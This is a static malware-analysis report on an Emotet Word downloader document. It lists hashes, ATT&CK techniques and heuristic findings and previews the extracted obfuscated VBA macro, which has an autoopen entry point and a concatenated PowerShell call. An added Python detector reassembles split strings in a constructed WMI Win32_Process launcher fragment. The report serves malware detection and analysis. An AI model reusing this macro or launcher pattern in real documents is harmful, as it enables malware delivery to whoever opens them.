Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 fb2baa745f5d1d2e…

MALICIOUS

Office (OLE)

Size: 242.1 KB · Created: 2019-03-11 15:23:00 · Authoring application: Microsoft Office Word · First seen: 2019-04-17
MD5: 605b3d0f13ad72d2dda3a571b42c54e4
SHA-1: ee53e6dbd3a09608b4efb7a3f5b5d5c4e2d27121
SHA-256: fb2baa745f5d1d2ef3e362764790f7afb13def5ad6c97d436e922a9475fbba16
Risk score: 282

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The critical heuristic OLE_VBA_WMI_PROCESS_CREATE reports that the VBA macro builds a WMI moniker for Win32_Process and calls .Create to launch a command, with the class name hidden behind string concatenation. Together with the autoopen entry point and the ClamAV signature Doc.Downloader.Emotet-6888558-0, this is the Emotet maldoc downloader pattern: heavily obfuscated VBA, padded with junk arithmetic and dead If blocks, whose one live statement assembles a PowerShell command line from split literals (visible in the preview below as "po" + ... + "wershel" + ...). That command line most likely downloads and executes the second-stage payload. The only extracted URL is an Office schema namespace, so the download location must be assembled inside the obfuscated macro and is not recovered statically here. The OLE_LEGACY_WORDBASIC_AUTOEXEC finding is described as firing only when no VBA project was recovered, yet olevba extracted a 60 KB VBA project from this file, so treat it as redundant with OLE_VBA_AUTOOPEN rather than as independent evidence.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-6888558-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6888558-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro: the macro runs automatically when the document is opened (the Sub autoopen() entry point in the preview below).
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call: the VBA function used to bind a moniker such as winmgmts: and obtain the WMI object that the Win32_Process launcher needs.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace present in ordinary Office documents and is not a network indicator; do not add it to a blocklist.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  60436 bytes
SHA-256: 4a3809d36c9b357a8cdf02ee9c86d6a1d5bd62c0fdfbb065b9c6a31218bf2e0d

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "KCDAB1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YAoAcUA()
   Set fkXABw = wXAkAUQA
    If qAABkAGA = NQC1XcA Then
         rA1xDAx = CBool(331546950 - Round(CDQUAAAQ) * UDQ_AU * 199427170)
         zXGBAB_ = Chr(M4D_ADU)
         TAGkX1A = CDate(72203852 * 754263603)
         sUAQcAQD = Oct(qAkAQAA - Round(jAcwADGB))
End If
   Set GAADxAo = iBDCUBD
    If w4AoQX = dBoXCoQA Then
         pUxCGQ = CLng(962720796 - CDbl(tAGDAB) * jAABAQAB * 295043834)
         lGQAA4B = CInt(BABAxo)
         uZA44AB = Tan(326015531 * 99565947)
         fGDUDQx = CDate(b4ZXAXA - Sin(RQDDcUAB))
End If
   Set TAU_AZAA = IDADQBX
    If qQAA1AGA = IDx4AxA Then
         kDDUBDBQ = CInt(524473724 - ChrW(GADxAAD) * JAABAU1 * 152642215)
         DUUAAAAA = CInt(Y_AAAA)
         zGAAkABA = Rnd(668889659 * 239035900)
         pU1AA4 = Int(lDXDUU - CByte(aDAAB1AA))
End If
   Set wox4AG1A = bDAABD
    If w_UACZ = ocUw_UU Then
         FABAxDc = ChrW(274826799 - Chr(CwAGCCk_) * KCQAAA1 * 238332441)
         HADAZCAA = ChrB(V_AGAD)
         XAACAX = Log(402121482 * 156006925)
         WkAADxUU = Round(JcABQG - CByte(ooAcXcQG))
End If
   Set iCxUDo = VQ_QUUAZ
    If j4UAAkA = LAAAGw Then
         vCQAoGU = Rnd(197039317 - CSng(ZQU4AGZ) * P4XoDUQA * 86388918)
         pAxADBAA = Cos(BBAUAXU4)
         G_AAAUA_ = ChrB(240485264 * 91840547)
         WXAAQDA = Chr(kAc1ABXC - Sin(H1AQAx))
End If
   Set iXXxxGGU = MGcUADcA
    If UBAcAQDw = ZcwQDAAA Then
         B1QAABxB = Int(784761315 - CBool(s1ZADAw) * fAADAw_ * 205667607)
         JAAQQkQA = Int(bAABwAU)
         zQCG4k4 = Rnd(137375139 * 430664323)
         TAQAQAAQ = CStr(QwkACD - CByte(GAQAQA))
End If
   Set aQABAAB = jZAcU_Q
    If kAD_AkAQ = Zo_BCo Then
         lckAAAQ = Chr(560795357 - Log(CUQDAA) * QADZ1DQ * 784928056)
         KCDDcBA = ChrB(pAGCoxCA)
         V4BABBD = Round(246508817 * 216385499)
         TGAoDXwC = Tan(NQQABAk_ - Fix(h_ADxA))
End If
End Function
Sub autoopen()
On Error Resume Next
   Set RAAAXA4D = SCkAwGAc
    If GcZZxwU = IXAxBXB Then
         NAAAU4GU = Tan(836694526 - Round(uGXwB4) * qACXDA * 638859433)
         z1AAoAU = ChrB(k1ABAUxD)
         AB_wAAC = Hex(565900788 * 305512387)
         jAAkAQc = CDbl(M_4BADAc - Cos(KU1AQcZ))
End If
   Set loBQZBU = boUA1wwU
    If ODBCwZw = zoBCAUQA Then
         SxAkwBDA = Cos(874558623 - Int(UDD1Ako) * C1AAAAU * 925895404)
         ZAZAAUwA = Log(G4ADw4Q)
         m1AckAA = Fix(582030249 * 237791620)
         tAGc1AA = CSng(vXBwQ_ - Cos(DBGAC1Z4))
End If
nw_X4Ak (zoUQAx + "po" + lBoABA + "wershel" + tAUcCBAG + BkA_AXAD + uoAAAUAB + JZAXBD + qXGDXkQ + iw1BUB + IQBG1A + oDAAxA + tADAUAZG)
   Set zU1DB1XA = F1AQGU
    If RADDCXAB = mABAcAkC Then
         QQoAAAk = CDate(287115903 - Atn(X4AAkw) * mDDc1XA * 261735182)
         QwUUAA = CInt(uAwwAcG)
         H1kAAUQ = Int(213326584 * 317072643)
         YUBoAD = CByte(lAAUxBAA - Cos(CkAUAQC))
End If
   Set IAGAGCkx = WGx4D1B
    If LoAwADXX = MkBAXwkX Then
         LQZA_4AA = Fix(505935207 - Cos(OZAwAAZZ) * n_AoABA * 855163222)
         GkAQ_UwQ = Int(IGUAC4QA)
         jGxXA1 = Int(330729557 * 168683964)
         BXA1AA = ChrW(oQUAAUAD - Cos(vAAA4A))
End If
End Sub
Function cDAAAB()
   Set WAAAGcA = mUABAwCA
    If XAGZG1Q = aokAZCkB Then
         GAAB_U1 = Sqr(433732450 - Fix(lxAwCxAQ) * YkcAAk * 619340989)
         jGDQQG1k = ChrW(pUBADC)
         uQ_1DX = CLng(368504264 * 898157917)
         dBADA4_ = Oct(ZoBGAZQ - ChrB(jGAAAoA))
End If
   Set cAAAQQ = fAQQQAD
    If pAAGDU = hAXAA4 Then
         PAAAAAU = CByte(282795031 - Hex(fXBUwQC) * HQBXA14o * 367044481)
         jUAA_QA = CInt(JQAAcQA)
         wUoBGw = CSng(749044112 * 730934858)
         mAAx4wUo = Hex(zUAxUA - ChrB(nwAACAA))
End If
   Set vwD1UQ = ZCDAAkAA
    If EDAACGQ = d1owUUAQ Then
     
... (truncated)
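As an added illustration (not part of this report and not olevba's own code), the following Python reassembles the split-literal strings that OLE_VBA_WMI_PROCESS_CREATE describes and that the preview shows in the nw_X4Ak (... "po" + ... + "wershel" + ...) call, then applies the same three checks the report's heuristics make: auto-exec entry point, WMI Win32_Process + .Create, and a PowerShell command line. The VBA fragment it scans is constructed for the example and is not taken from macros.bas; the variable names, the GetObject/Create lines and the "-enc JAB" argument are invented to mirror the obfuscation style, and unknown identifiers are assumed to evaluate to an empty string.

```python
"""Reassemble concatenation-obfuscated VBA strings and flag the WMI
Win32_Process / PowerShell launcher pattern (added example, not tool output)."""
import re

# Constructed VBA fragment (not from the sample) mirroring the preview's style:
# sensitive words split into short literals joined with "+", padded with junk
# identifiers, and one fragment parked in a variable assigned earlier.
SAMPLE_VBA = '''
Sub autoopen()
On Error Resume Next
    lBoABA = "wershel"
    Set oQ = GetObject("winmg" + xA + "mts:" + "win32_" + bB + "Process")
    oQ.Create ("po" + lBoABA + "l -e" + "nc JAB"), Null, Null, pid
    nw_X4Ak (zoUQAx + "po" + tAUcCBAG + "wershel" + BkA_AXAD)
End Sub
'''

LITERAL = r'"[^"]*"'
IDENT = r'[A-Za-z_][A-Za-z0-9_]*'
TOKEN = rf'(?:{LITERAL}|{IDENT})'
# Two or more literals/identifiers joined by the VBA concatenation operators.
CHAIN_RE = re.compile(rf'{TOKEN}(?:\s*[+&]\s*{TOKEN})+')
# Plain "name = <rhs>" assignment on its own line.
ASSIGN_RE = re.compile(rf'^\s*({IDENT})\s*=\s*(.+?)\s*$', re.M)
AUTOEXEC_RE = re.compile(r'\b(autoopen|auto_open|document_open|workbook_open)\b', re.I)


def collapse_chain(chain, env):
    """Join the literals of one concat chain; an identifier contributes its
    resolved literal value, or nothing if unknown (assumed empty)."""
    parts = []
    for tok in re.findall(TOKEN, chain):
        parts.append(tok[1:-1] if tok.startswith('"') else env.get(tok, ""))
    return "".join(parts)


def literal_assignments(src):
    """Single source-order pass resolving variables that are assigned a string
    literal or a chain of literals (enough for this obfuscation style)."""
    env = {}
    for name, rhs in ASSIGN_RE.findall(src):
        if re.fullmatch(LITERAL, rhs) or CHAIN_RE.fullmatch(rhs):
            env[name] = collapse_chain(rhs, env)
    return env


def reassemble_strings(src):
    """Return every non-empty string that a concat chain in src evaluates to."""
    env = literal_assignments(src)
    found = []
    for m in CHAIN_RE.finditer(src):
        s = collapse_chain(m.group(0), env)
        if s:
            found.append(s)
    return found


def classify(src):
    """Apply the report's three launcher checks to the reassembled strings."""
    strings = [s.lower() for s in reassemble_strings(src)]
    low = src.lower()
    wmi = any("winmgmts" in s or "win32_process" in s for s in strings)
    return {
        "autoexec": AUTOEXEC_RE.search(src) is not None,
        "wmi_process_create": wmi and ".create" in low,
        "powershell": any("powershell" in s for s in strings) or "powershell" in low,
        "strings": strings,
    }


if __name__ == "__main__":
    for key, val in classify(SAMPLE_VBA).items():
        print(f"{key}: {val}")
```

The third reassembled string comes out as "powershel" because the identifiers around it are never assigned in the fragment; that is exactly the gap the heuristic text refers to when it mentions string concatenation hidden behind helper functions, and why a production pipeline resolves assignments across the whole VBA project or emulates the macro (ViperMonkey) rather than trusting a single regex pass.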